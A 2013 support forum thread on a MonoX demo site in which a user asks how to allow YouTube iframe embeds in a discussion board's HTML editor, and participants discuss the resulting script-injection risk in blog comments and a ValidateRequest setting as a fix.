Login
Back to all discussion topics

Mono Support How to customize the HTML Editor to allow posting embedded codes (iframe) from Youtube? 

Viewed 31672 time(s), 11 post(s), 11/9/2013 3:55:11 AM - by bkkmono
bkkmono
bkkmono
11/9/2013 4:14:20 AM
434 Reputation 51 Total posts

Hello,

I tried to post a embedded code from Youtube in the Html Editor while creating a topic post in a Discussion Board, but the code was encoded into words instead of interpreting the iframe code to display a video clip. I know that Html Editor in the text area of a discussion board uses CustomRadEditor to show the editor tools but I don't know how to add or remove each funtion in the Html Editor. 

How to customize the HTML Editor to allow posting embedded codes (iframe) from Youtube?

1
khorvat
khorvat
11/9/2013 6:44:26 AM
15993 Reputation 2214 Total posts

You will have to enable html mode on that editor in order to post that type of content.

Regards

2
bkkmono
bkkmono
11/9/2013 2:07:32 PM
434 Reputation 51 Total posts

OK, i get it. I edited this xml file: "DiscussionRadEditorToolsFile.xml" to add or remove tools on it.

3
Zoomicon
Zoomicon
11/9/2013 7:02:27 PM
2793 Reputation 345 Total posts

If it allows you to enter ANY HTML you should be careful where you allow it. People could inject unwanted/malicious behaviour into your website like that.

4
bkkmono
bkkmono
11/9/2013 9:22:12 PM
434 Reputation 51 Total posts

Thank you Zoomicon for suggestion. I think Javascript is disabled by default although HTML would be allowed to post. I just tested by posting a Javascript code in a blog post, then it vanished and didn't work.

However, this may be more obvious if Monox's staff would answer this concern.

5
bkkmono
bkkmono
11/9/2013 9:40:47 PM
434 Reputation 51 Total posts

Bad news update: I just tested adding a Javascript code in a comment of a blog. The result is that Javascript can run on MonoX by everyone!!

As a result, a spammer could attack my site by posting malicious Javascript code on a comment of a blog.

6
bkkmono
bkkmono
11/9/2013 11:18:26 PM
434 Reputation 51 Total posts

I added ValidateRequest="true" in the tag: <%@ Page of Blog.aspx in order to prevent users from posting Javascript code or even Html code in comments of blog posts. It is working fine.

7
khorvat
khorvat
11/10/2013 9:43:39 AM
15993 Reputation 2214 Total posts

Hi,

  Did you try to post the Javascript on Blog comments while being logged in as Administrator, ordinary user or you haven't been loged in at all?

Btw officially support team is not working over the weekend.

Thanks for the feedback.

8
khorvat
khorvat
11/11/2013 8:30:37 AM
15993 Reputation 2214 Total posts

Just to confirm that posting a comment on Blog as unauthenticated user doesn't allow you to inject any kind of Javascript.

Please let us know how did you manage to "inject" any kind of Javascript in the comment, as per my previous question.

Thanks

9
Zoomicon
Zoomicon
11/11/2013 9:35:00 AM
2793 Reputation 345 Total posts

do you mean unauthorized (non admin or some extra roles?) when you say unauthenticated?

cause registering as a user is usually free and doesn't stop an attacker

also social engineering might trick a moderator so I'd prefer default to be only for admins or even turned off at web.config or something

how can one check (some SQL query maybe?) for already injected javascript?

btw, even allowing object and embed can deface a site or trick the user etc. (or do some xss exploit depending on the web browser), so they should be at the same level of protection as scripts and other html (eg wouldn't want a float in a comment to go over your content)

10
1 2
This is a demo site for MonoX. Please visit Mono Software for more info.